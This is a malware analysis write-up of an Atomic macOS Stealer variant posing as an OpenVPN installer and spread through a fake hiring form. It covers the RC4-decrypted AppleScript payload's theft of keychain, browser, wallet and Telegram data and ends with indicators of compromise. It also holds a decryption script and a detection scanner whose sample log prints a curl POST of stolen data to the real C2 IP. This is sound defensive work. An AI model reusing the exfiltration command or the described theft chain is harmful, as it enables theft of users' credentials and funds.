Malware Research - AMOS Variant (OpenVPN)
I was given the opportunity to conduct malware analysis on a suspicious program downloaded by one of our employees at work. I was praised for my efforts and dedication in analyzing it which gave me the motivation to keep on learning about malware analysis and CTI. Here is my writeup on the whole incident.
Summary
The payload was a variant of the Atomic macOS Stealer (AMOS), delivered by a campaign that targeted both Windows and macOS users. I documented this incident because it was the first AMOS variant (to my knowledge) that masqueraded as OpenVPN and used RC4 to encrypt its payload. Attachment (password is infected)
Distribution
On 12 September 2024, the victim received a Google Form from a company calling itself Vantage Point Media, sent from an address at vpmediatech[.]com. The Google Form posed as a hiring test: it prompted the victim to enter their email address and full name and to answer a set of questions mimicking real interview questions.
On the final page, the victim is prompted to download a suspicious installer, offered for both Windows and macOS, from the link hxxps[:]//openvpn[.]tech/vpn-download.
If the victim was using macOS, the download link redirected to hxxps[:]//utv4fun[.]com/kusaka.php?call=vpn, where a DMG file was fetched and downloaded.
Note: the DMG file appears to be polymorphic, since each new DMG downloaded from the URL carried its own version number.
If the victim was using Windows, the download link redirected to hxxps[:]//openvpn-win[.]pages[.]dev, where an MSI installer was fetched and downloaded. However, this writeup covers only the DMG file for now.
Malware Analysis
Mounting the DMG file in a virtual machine yields a universal Mach-O binary called openvpn-connect that supports both x86 and ARM architectures. It is also ad-hoc signed, meaning the signature is not backed by any certificate and provides no cryptographic proof of who built it.
Opening the DMG file shows an on-screen prompt instructing the user to launch the malicious Mach-O binary by right-clicking it and choosing Open. This is a common tactic for bypassing the built-in security feature of Apple's operating system (known as Gatekeeper) in order to run unsigned applications.
Launching the Mach-O binary, the user is prompted again, this time for the root password. This was most likely done to trick the user into granting the malware root privileges so it can access certain macOS utilities.
Disassembling the Mach-O binary with otool reveals a long hex string, suggesting that the payload is hex-encoded.
Conveniently, a 32-byte hex string sits directly below the encoded payload, most likely the decryption key.
Payload Analysis
After trying several algorithms on the hex string, the payload decrypted successfully with RC4, yielding the full AppleScript payload for further analysis.
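To show the recovery step concretely, here is an added example (my own code, not taken from the sample or the writeup's tooling) that pulls the long hex blob and the key that follows it out of a strings/otool dump, RC4-decrypts the blob, and sanity-checks that the result reads like AppleScript. The dump, key and script in the block are constructed stand-ins, not the real sample's values.

```python
import re

# Added example, not code from the writeup: recover the RC4-encrypted, hex-encoded
# AppleScript payload from a strings/otool dump of the Mach-O binary. The dump,
# key and script below are constructed stand-ins, not the real sample's values.

HEX_RUN = re.compile(r"\b[0-9a-fA-F]{32,}\b")   # hex runs of 16 bytes or more

def rc4(key, data):
    """Plain RC4 (KSA + PRGA). Encryption and decryption are the same operation."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

def extract_candidates(dump):
    """Return (payload_hex, key_hex): the longest hex run in the dump and the first
    hex run after it, matching the layout described above (key right below payload)."""
    runs = [(m.start(), m.group()) for m in HEX_RUN.finditer(dump)]
    if not runs:
        return None
    pos, payload = max(runs, key=lambda r: len(r[1]))
    following = [r for p, r in runs if p > pos]
    return (payload, following[0]) if following else None

def decrypt_payload(payload_hex, key_hex):
    """Hex-decode both values and RC4-decrypt; returns the script as text."""
    return rc4(bytes.fromhex(key_hex), bytes.fromhex(payload_hex)).decode("utf-8", "replace")

def looks_like_applescript(text):
    """Sanity check that key and algorithm were right: real output contains
    AppleScript keywords, a wrong key yields high-entropy garbage."""
    return re.search(r"\b(set|do shell script|tell application|on run)\b", text) is not None

# Constructed sample: a dummy key and a stand-in script, encrypted and laid out the
# way the binary's string table presented them (key directly below the payload).
SAMPLE_KEY = bytes(range(0x10, 0x30))                    # 32 bytes, not a real key
SAMPLE_SCRIPT = 'set username to do shell script "whoami"\n'
SAMPLE_DUMP = ("openvpn-connect\n" + rc4(SAMPLE_KEY, SAMPLE_SCRIPT.encode()).hex()
               + "\n" + SAMPLE_KEY.hex() + "\n_main\n")
```

Feeding the output of `strings` on the real binary into `extract_candidates` gives the two values to pass to `decrypt_payload`; if `looks_like_applescript` is false, the key or algorithm guess was wrong.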
Hide Terminal and Create Staging Directory
The payload begins by keeping the Terminal window hidden while it runs in the background, concealing itself from the user.
It then retrieves the current username to construct the path to the user's home directory, and creates a staging directory under /tmp/ to store the stolen data. The staging directory name appears to be a random four-digit number in the range 1000-9999.
Extract System Information
Data extraction begins with system information, including software, hardware and display configuration, collected with the system_profiler utility. The output of this command is written to a file named "info" under the staging directory.
Password Prompt using DSCL
The payload constructs the path to the user's Application Support directory, which it uses to locate data from various applications. It then calls a function that retrieves the user's password through an authentication prompt backed by the DSCL utility.
If the password entered is valid, the payload attempts to retrieve the Chrome password from the macOS keychain and writes it to a file named "masterpass-chrome" under the staging directory. If not, the payload enters a loop that keeps prompting the user until a valid password is entered.
Extract Browser and Cryptocurrency Wallet Data
Several mappings define the directory paths of specific Chromium-based browsers and cryptocurrency wallet applications. The payload then recursively reads the mapped directories to extract Chromium-based browser data (cookies, web data, plugins, etc.) and the JSON files of specific cryptocurrency wallet applications.
The payload also extracts Safari cookies, the Apple Notes database, and files with the extensions .pdf, .docx, .doc, .wallet and .keys from the Desktop, Documents and Downloads folders. The extracted data is copied into a folder named "FileGrabber" under the staging directory.
Interesting observation: the FileGrabber function seems to copy only files no larger than 10 MB into the "FileGrabber" folder. This was most likely done to avoid bandwidth problems, server-side limits and timeouts during exfiltration to the C2 server.
Data from other sources, including Firefox data, the keychain database and Telegram data, is also extracted and stored in separate files under the staging directory.
Exfiltration
Finally, the payload compresses the staging directory into a ZIP file, out.zip, and exfiltrates it to the C2 server using curl. The ZIP file is sent in an HTTP POST request to http://85.209.11.155/joinsystem/ together with a predefined user and BuildID. The payload then covers its tracks by removing the staging directory and the ZIP file after exfiltration.
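The staging directory, archive name and C2 request described in this section make a usable detection chain. The following added example (my own, not part of the writeup or the sample) scans process-execution events for those behaviours and flags users whose activity shows both staging-directory use and the POST to /joinsystem/; the log format and every event in it are constructed for the demonstration, with only the C2 IP and URL path taken from this writeup.

```python
import re

# Added example, not from the writeup: scan process-execution events for the
# behaviour described above (staging dir /tmp/<1000-9999>, out.zip, curl POST to
# /joinsystem/, cleanup). Log format and events below are constructed.

STAGING = r"/tmp/[1-9]\d{3}\b"          # /tmp/ plus a random number in 1000-9999

RULES = [
    ("staging_ref",     re.compile(STAGING)),
    ("staging_zip",     re.compile(r"\bzip\b.*\bout\.zip\b.*" + STAGING)),
    ("c2_post",         re.compile(r"\bcurl\b(?=.*(?:-X\s*POST|-F\s|--data|-d\s))"
                                   r"(?=.*https?://(?:\d{1,3}\.){3}\d{1,3}/joinsystem/)")),
    ("staging_cleanup", re.compile(r"\brm\b.*-r.*" + STAGING)),
]

def parse_event(line):
    """Parse one constructed 'ts=... user=... cmd="..."' line into a dict."""
    ts, user, cmd = re.match(r'ts=(\S+) user=(\S+) cmd="(.*)"$', line).groups()
    return {"ts": ts, "user": user, "cmd": cmd}

def match_rules(cmd):
    """Names of all rules whose pattern appears in the command line."""
    return [name for name, rx in RULES if rx.search(cmd)]

def scan(lines):
    """Return every event that triggers at least one rule, with the rule names."""
    hits = []
    for ev in map(parse_event, lines):
        rules = match_rules(ev["cmd"])
        if rules:
            hits.append({**ev, "rules": rules})
    return hits

def flagged_users(hits):
    """Users who both used a staging dir and issued the C2 POST: the full chain."""
    seen = {}
    for h in hits:
        seen.setdefault(h["user"], set()).update(h["rules"])
    return {u for u, r in seen.items() if {"staging_ref", "c2_post"} <= r}

# Constructed sample events (the IP and URL path are the ones reported above).
SAMPLE_LOG = """\
ts=2024-09-12T10:01:03Z user=alice cmd="ls -la /Users/alice/Downloads"
ts=2024-09-12T10:02:11Z user=alice cmd="system_profiler SPSoftwareDataType > /tmp/4821/info"
ts=2024-09-12T10:03:05Z user=alice cmd="zip -r /tmp/4821/out.zip /tmp/4821"
ts=2024-09-12T10:03:09Z user=alice cmd="curl -X POST -F file=@/tmp/4821/out.zip http://85.209.11.155/joinsystem/"
ts=2024-09-12T10:03:12Z user=alice cmd="rm -rf /tmp/4821 /tmp/4821/out.zip"
ts=2024-09-12T10:05:00Z user=bob cmd="curl -s https://example.com/ -o /tmp/page.html"
""".splitlines()
```

Against the constructed log, `scan` flags the four stealer commands and `flagged_users` returns only alice, while bob's ordinary curl download does not match.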
Indicators of Compromise
Indicator | Type | Description |
---|---|---|
7f4582259482af646aecd6b1addb50cb283706753376e7dbadb4c33ab3ddff21 | SHA256 | DMG file |
9793fc09d1f18b16cc7e1af52e68957387eda27e904fe44cdad904016fcb55b8 | SHA256 | Mach-O binary |
hxxps://docs[.]google[.]com/forms/d/e/1FAIpQLSdjxyobIi5WKyT9dvL8NgYBk6434oYqhGomOHrCDPSBK1shCw/viewform?usp=sf_link | URL | Google Form |
hxxps://openvpn[.]tech/vpn-download | URL | Download link |
hxxps://utv4fun[.]com/kusaka[.]php?call=vpn | URL | macOS installer download |
hxxps://openvpn-win[.]pages[.]dev | URL | Windows installer download |
openvpn[.]tech | Domain | Malicious domain |
85[.]209[.]11[.]155 | IP address | C2 server |